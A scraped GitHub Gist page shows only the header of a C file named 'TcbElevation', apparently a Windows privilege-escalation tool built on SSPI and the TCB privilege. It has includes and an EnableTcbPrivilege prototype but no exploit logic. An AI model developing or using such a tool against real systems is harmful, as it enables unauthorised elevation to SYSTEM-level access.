Skip to content

Instantly share code, notes, and snippets.

View predyy's full-sized avatar

Matej Rada predyy

  • 124 Conch Street, Bikini Bottom, Pacific Ocean
View GitHub Profile
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);